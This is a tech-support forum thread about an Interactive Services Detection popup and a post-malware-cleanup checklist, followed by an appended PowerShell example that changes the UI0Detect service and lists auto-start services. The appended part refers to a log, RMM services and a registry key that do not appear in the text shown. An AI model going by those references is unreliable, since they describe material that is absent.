Sorry, had to get user info first. Things seem to be solid. No recurrence of anything that was a problem before.
However I am getting an Interactive Services Detection popup triggering on a dll I do not recognize:

[Screenshot attached: upload_2014-10-14_15-48-46.png]
 
I haven't been able to trigger it on purpose yet. It will appear minimized in the user's taskbar until noticed, and after clearing it will stay away for hours at a time. At some random time it will show back up again, usually a couple of hours later. The one I screenshotted above triggered at 1pm after it had been cleared at about 9:30am.

I'll check the eventvwr next time I'm able to get the frequency and/or if it commonly follows another error type.
 
This is definitely not malware related.

You can try this workaround:

  1. Click Start > Control Panel and then double-click Administrative Tools.
  2. Double-click Services.
  3. Scroll down and double-click Interactive Services Detection.
  4. On the General tab, change the Startup type to Manual or Disabled.
  5. Click OK and restart the computer.
...or start a new topic in the Windows forum.

Here...

Your computer is clean

1. This step will remove all cleaning tools we used, it'll reset restore points (so you won't get reinfected by accidentally using some older restore point) and it'll make some other minor adjustments...
This is a very crucial step so make sure you don't skip it.
Download DelFix by Xplode to your desktop. DelFix will delete all the used tools and logfiles.

Double-click Delfix.exe to start the tool.
Make sure the following items are checked:
  • Activate UAC (optional; some users prefer to keep it off)
  • Remove disinfection tools
  • Create registry backup
  • Purge System Restore
  • Reset system settings
Now click "Run" and wait patiently.
Once finished a logfile will be created. You don't have to attach it to your next reply.

2. Make sure Windows Updates are current.

3. If any trojans, rootkits or bootkits were listed among your infection(s), make sure you change all of your important online passwords (bank account(s), secured web sites, etc.) immediately!

4. Check if your browser plugins are up to date.
Firefox - https://www.mozilla.org/en-US/plugincheck/
other browsers: https://browsercheck.qualys.com/ (click on "Launch a quick scan now" link)

5. Download, and install WOT (Web OF Trust): http://www.mywot.com/. It'll warn you (in most cases) about dangerous web sites.

6. Run a Malwarebytes "Quick scan" once in a while to ensure the safety of your computer.

7. Run Temporary File Cleaner (TFC), AdwCleaner and Junkware Removal Tool (JRT) weekly (you need to redownload these tools since they were removed by DelFix).

8. Download and install Secunia Personal Software Inspector (PSI): https://www.techspot.com/downloads/4898-secunia-personal-software-inspector-psi.html. The Secunia PSI is a FREE security tool designed to detect vulnerable and out-dated programs and plug-ins which expose your PC to attacks. Run it weekly.

9. (optional) If you want to keep all your programs up to date, download and install FileHippo Update Checker.
The Update Checker will scan your computer for installed software, check the versions and then send this information to FileHippo.com to see if there are any newer releases.

10. When installing/updating ANY program, make sure you always select "Custom" installation, so you can UN-check any possible "drive-by-install" (foistware), like toolbars etc., which may try to install along with the legitimate program. Do NOT click the "Next" button without looking at any given page.

11. Read:
How did I get infected?, With steps so it does not happen again!: http://www.bleepingcomputer.com/forums/topic2520.html
Simple and easy ways to keep your computer safe and secure on the Internet: http://www.bleepingcomputer.com/tutorials/keep-your-computer-safe-online/
About those Toolbars and Add-ons - Potentially Unwanted Programs (PUPs) which change your browser settings: http://www.bleepingcomputer.com/for...curity-questions-best-practices/#entry3187642
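An added example, not part of the reply above or of any tool it mentions: the Services-console workaround for Interactive Services Detection expressed in PowerShell, together with the check a practitioner would want to run before silencing the popup. The popup only appears because some service tried to draw a window from session 0, so it is worth listing which auto-start services run from outside the Windows and Program Files trees first. The service name UI0Detect is the real name behind "Interactive Services Detection"; the $trusted path pattern is my own heuristic, not something the thread identified.

```powershell
# Added example, not from the original thread: the Services-console steps
# above as PowerShell, run from an elevated prompt on Windows 7 / Server 2008 R2.
# "Interactive Services Detection" is the service named UI0Detect.
$svcName = 'UI0Detect'

# 1. Record the current state and startup type before changing anything.
Get-WmiObject -Class Win32_Service -Filter "Name='$svcName'" |
    Select-Object Name, DisplayName, State, StartMode, PathName

# 2. Stop the service and set its startup type. Manual keeps the detection
#    available (Windows can still start it when a service tries to show UI in
#    session 0); Disabled suppresses the popup completely.
Stop-Service -Name $svcName -ErrorAction SilentlyContinue
Set-Service  -Name $svcName -StartupType Manual

# 3. The popup is a symptom, so look for its source: list auto-start services
#    whose binary is not under \Windows or \Program Files. A service binary or
#    DLL living in a user profile is the pattern that started this thread.
#    The pattern below is a heuristic assumption, not a rule from the thread.
$trusted = '^"?[A-Za-z]:\\(Windows|Program Files( \(x86\))?)\\'
Get-WmiObject -Class Win32_Service |
    Where-Object { $_.StartMode -eq 'Auto' -and $_.PathName -and
                   ($_.PathName -notmatch $trusted) } |
    Select-Object Name, StartMode, State, PathName |
    Format-Table -AutoSize
```

Expect some noise from step 3 on this machine: the RMM services in the log above are registered with 8.3 short paths (c:\progra~1\SAAZOD\...), which the pattern does not recognise as Program Files, so they will be listed alongside anything genuinely suspicious. Services hosted inside svchost.exe show svchost's own path, so a DLL loaded through a svchost group (the HPZ12 key in the log) has to be checked through that group's ServiceDll values rather than through PathName.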
 